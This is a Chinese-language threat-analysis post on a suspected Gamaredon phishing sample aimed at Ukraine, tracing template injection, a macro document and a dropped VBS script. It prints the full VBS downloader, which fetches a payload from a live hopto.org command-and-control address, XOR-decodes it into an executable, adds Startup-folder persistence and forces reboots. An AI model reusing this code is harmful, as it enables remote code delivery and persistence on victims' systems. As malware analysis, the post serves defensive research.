0x00 前言

https://send.firefox.com/download/2cc8ac146d5da1b4/#vtGpxNhT5mLb7hNwZ-mgAg
最近在样本追踪中,发现了一例疑似Gamaredon的攻击,随后依靠开源情报,发现Gamaredon近期还比较活跃,近一个月投递了众多针对乌克兰地区的攻击样本。而Gamaredon是一个俄罗斯的APT攻击组织,首次出现于2013年,主要是针对乌克兰进行网络间谍活动。2017年,Palo Alto披露过该组织针对乌克兰攻击活动的细节,并首次将该组织命名为Gamaredon group。

0x01 基本信息

原始样本hash为:c0dc0c23e675d0c380e243fb36ee005e
vt上传时间为1月14日
image.png

样本下载后,通过winhex查看基本可以确定是office格式的文档
image.png

尝试压缩软件打开可知是docx文档
image.png

添加docx后缀打开之后,是熟悉的模板注入:
image.png
注入地址为 hxxp://dochlist[.]hopto.org/opt[.]dot

文档内容如下
image.png

通过查询,我们可以得知文章内容是乌克兰语,署名是<乌克兰安全局>
image.png

文档最上方的图案也对应了乌克兰安全局Служба безпеки України的官网图标
image.png

而根据对Gamaredon的了解,我们也知道该组织自2013年开始,就常针对乌克兰的政府人员发起攻击,常见手法便是伪装乌克兰安全局,分发相关的钓鱼邮件,与本次攻击颇为符合。

0x02 注入文档

将原始文档注入的dot下载到本地,MD5为689fab7a016dae57300048539a4c807e
注入的dot文档内容为空,是一个宏代码利用文档:
image.png

查看宏代码,是Gamaredon很常用的一套代码
image.png

宏代码最开始创建了两个对象
分别是Wscript.Shell和Wscript.Network,用于后面的shell执行以及网络请求

  1. Dim yOer
  2. yOer = "Set WShell=CreateObject(""WSc" + "ri" + "pt.S" + "hel" + "l"")"
  3. Set DurJ = CreateObject("WScr" + "ipt.Ne" + "two" + "rk")

然后通过代码创建Scripting.FileSystemObject对象以提供对文件系统的访问

  1. Set hIYg = CreateObject("Sc" + "rip" + "ting.Fi" + "leSy" + "stemOb" + "ject")

然后获取当前的主机信息,拼接为一个请求字符串,用于后续的请求
请求地址为 hxxp://skrembler[.]hopto[.]org/WIN-IHN30SD7IMB_9AC9AA87/tor[.]php”
image.png

宏代码执行完成后,会在C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup路径下释放security.vbs文件
image.png

释放的vbs文件hash为195f3fab75ca0602a8c2053070dd1ca3

释放文件的代码格式化后如下:

  1. On Error Resume Next
  2. Dim MTYj
  3. MTYj = DateAdd("s", 25, Now())
  4. Do Until (Now() > MTYj)
  5. Loop
  7. Function CZeq(oBIE)
  8. On Error Resume Next
  9. Set bkDw = CreateObject("MSXML2.XMLHTTP")
  10. With bkDw
  11. .Open "GET", oBIE, False
  12. .send
  13. End With
  14. If bkDw.Status = 200 Then
  15. CZeq = bkDw.ResponseBody
  16. End If
  17. End Function
  19. Function Encode( FCkE, BGmO, msKq )
  20. Dim joCE, HHHm, NgjR, jIFy, vHqt, mzrI 
  21. Const ForAppending =  8
  22. Const ForReading =  1
  23. Const ForWriting =  2
  24. Const TristateFalse =  0
  25. Const TristateMixed = -2
  26. Const TristateTrue = -1
  27. Const TristateUseDefault = -2
  28. On Error Resume Next
  29. If Not IsArray( msKq ) Then
  30. msKq = Array( msKq )
  31. End If
  32. For joCE = 0 To UBound( msKq )
  33. If Not IsNumeric( msKq(i) ) Then
  34. Encode = 1032
  35. Exit Function
  36. End If
  37. If msKq(joCE) < 0 Or msKq(joCE) > 255 Then
  38. Encode = 1031
  39. Exit Function
  40. End If
  41. Next
  42. Set HHHm = CreateObject( "Scripting.FileSystemObject" )
  43. If HHHm.FileExists( FCkE ) Then
  44. Set NgjR   = HHHm.GetFile( FCkE )
  45. Set vHqt = NgjR.OpenAsTextStream( ForReading, TriStateFalse )
  46. Else
  47. vHqt.Close
  48. Set vHqt = Nothing
  49. Set NgjR = Nothing
  50. Set HHHm = Nothing
  51. Exit Function
  52. End If
  53. If HHHm.FileExists( BGmO ) Then
  54. vHqt.Close
  55. Set vHqt = Nothing
  56. Set NgjR = Nothing
  57. If HHHm.Fileexists( FCkE) Then HHHm.DeleteFile  FCkE 
  58. Set HHHm = Nothing
  59. Exit Function
  60. Else
  61. Set jIFy = HHHm.CreateTextFile( BGmO, True, False )
  62. End If
  63. set joCE = 0
  64. Do Until vHqt.AtEndOfStream
  65. For joCE = 0 To UBound( msKq )
  66. joCE + 1 mod ( UBound( msKq ))
  67. jIFy.Write Chr( Asc( vHqt.Read( 1 ) ) Xor msKq(joCE) )
  68. if vHqt.AtEndOfStream Then Exit Do
  69. Next
  70. Loop
  71. set joCE = 0
  72. Do Until vHqt.AtEndOfStream  
  73. joCE = ( joCE + 1 ) \ ( UBound( msKq ) + 1 )
  74. jIFy.Write Chr( Asc( vHqt.Read( 1 ) ) Xor msKq(mzrI) )
  75. joCE=joCE+1
  76. If mzrI<UBound( msKq ) Then 
  77. mzrI=mzrI+1
  78. else mzrI=0
  79. End If
  80. Loop
  81. jIFy.Close
  82. If HHHm.Fileexists(FCkE) Then HHHm.DeleteFile FCkE 
  83. vHqt.Close
  84. Set vHqt = Nothing
  85. Set NgjR   = Nothing
  86. Set jIFy  = Nothing
  87. Set HHHm      = Nothing
  88. On Error Goto 0
  89. End Function
  92. Function GetHKcc( KCel )
  93. Dim joCE, msKq( )
  94. ReDim msKq( Len( KCel ) - 1 )
  95. For joCE = 0 To UBound( msKq )
  96. msKq(joCE) = Asc( Mid( KCel, joCE + 1, 1 ) )
  97. Next
  98. GetHKcc = msKq
  99. End Function
  102. Function pdBR(ByVal QopZ)
  103. Dim qsGf
  104. Const EhpF = "abcdefghijklmnopqrstuvwxyz0123456789"
  105. Randomize
  106. For joCE = 1 To QopZ
  107. qsGf = qsGf & Mid(EhpF, Int(36 * Rnd + 1), 1)
  108. Next
  109. pdBR = qsGf
  110. End Function
  113. Sub save(data)
  114. Dim vNsF
  115. vNsF = "1"
  116. vNsF = pdBR(5)
  117. Set CQLk = CreateObject("Scripting.FileSystemObject")
  118. Set jSmA = CreateObject("ADODB.Stream")
  119. On Error Resume Next
  120. jSmA.Open
  121. jSmA.Type = 1
  122. jSmA.Write (data)
  123. jSmA.Position = 0
  124. Set CQLk = Nothing
  125. jSmA.SaveToFile "C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+ vNsF +".txt"
  126. jSmA.Close
  127. WScript.Sleep 7273
  128. Set PaKX = CreateObject("Scripting.FileSystemObject")
  129. Set lCPt = PaKX.GetFile("C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+ vNsF +".txt")
  130. If lCPt.Size < 1025 Then lCPt.Delete
  131. Dim arrHKcc, kcEE
  132. arrHKcc = GetHKcc( "9AC9AA87")
  133. kcEE = Encode( "C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+ vNsF +".txt", "C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+vNsF+".exe", arrHKcc )
  134. WScript.Sleep 6425
  135. If PaKX.FileExists( "C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+ vNsF +".txt" ) Then PaKX.DeleteFile "C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+ vNsF +".txt"
  136. If PaKX.FileExists( "C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+vNsF+".exe" ) Then
  137. Set DeCQ = PaKX.CreateTextFile("C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+ vNsF +".vbs", True, True)
  138. DeCQ.Write "On Error Resume Next" & vbCrLf
  139. DeCQ.Write "Set PaKX = CreateObject(""Scripting.FileSystemObject"")"& vbCrLf
  140. DeCQ.Write "createobject(""Wscript.Shell"").run ""C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+vNsF+".exe"",0" & vbCrLf
  141. DeCQ.Write "PaKX.DeleteFile Wscript.ScriptFullName"& vbCrLf
  142. DeCQ.Close
  143. End If 
  144. If kcEE <> 0 Then
  145. End If
  146. End Sub
  149. hutC = 1
  150. Do While hutC > 0
  151. WScript.Sleep 181224
  152. save CZeq("http://skrembler.hopto.org/WIN-IHN30SD7IMB_9AC9AA87/tor.php")
  153. Dim QKLN, zIvq, jJjj, CQLk
  154. Set YDJG = CreateObject("Scripting.FileSystemObject")
  155. QKLN = YDJG.GetParentFolderName("C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+vNsF+".exe")
  156. With WScript.CreateObject("Scripting.FileSystemObject")
  157. Set HHHm = CreateObject("Scripting.FileSystemObject")
  158. If HHHm.Fileexists("C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+ vNsF +".txt") Then HHHm.DeleteFile "C:\Users\Shyt\AppData\Roaming\Microsoft\Excel\"+ vNsF +".txt" 
  159. jJjj = 0
  160. For Each zIvq In .GetFolder(QKLN).Files
  161. If UCase(.GetExtensionName(zIvq.Name)) = UCase("exe") Then
  162. jJjj = jJjj + 1
  163. End If
  164. Next
  165. If (jJjj > 2) Then
  166. Dim NYBz, IHEL, IHELSheck
  167. Set NYBz = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
  168. Set IHEL = NYBz.Instances_
  169. For Each IHELSheck In IHEL
  170. IHELSheck.Reboot()
  171. Next
  172. End If
  173. End With
  174. Loop

程序最开始通过

  1. On Error Resume Next
  2. Dim MTYj
  3. MTYj = DateAdd("s", 25, Now())
  4. Do Until (Now() > MTYj)
  5. Loop

启用一个循环,第一次见这种,不知道是不是反沙箱的设计

该程序的入口点在程序最下方,程序通过

  1. hutC = 1
  2. Do While hutC > 0
  3. WScript.Sleep 181224

的设置来启动一个永真循环,这里的slepp应该也是反沙箱的设计

接着程序尝试请求之前拼接好的请求地址,并且如果请求成功则会将返回的body做为参数传入到save函数用于保存

  1. save CZeq("http://skrembler.hopto.org/WIN-IHN30SD7IMB_9AC9AA87/tor.php")

Czeq函数如下
image.png

如果成功请求,则会将返回值写入到%APPDATA%\Microsoft\Excel\ 目录下,文件名为由pdBR生成的5位随机数
尝试将传入进来的data进行写入,写入之后程序会判断文件大小是否大于1025,如果小于则删除
如果文件大于1025说明成功请求,则会将txt文件作为参数传递到Encode进行解密,解密后会在当前目录释放一个与txt同名的exe文件。
exe文件成功释放之后程序会在%APPDATA%Microsoft\Windows\Start Menu\Programs\Startup\目录下释放一个同名的vbs文件,该vbs文件用于调用执行刚才解密的exe。
image.png

程序成功保存并运行后,攻击者还将通过指定目录下的exe个数来控制是否重启用户的计算机:
image.png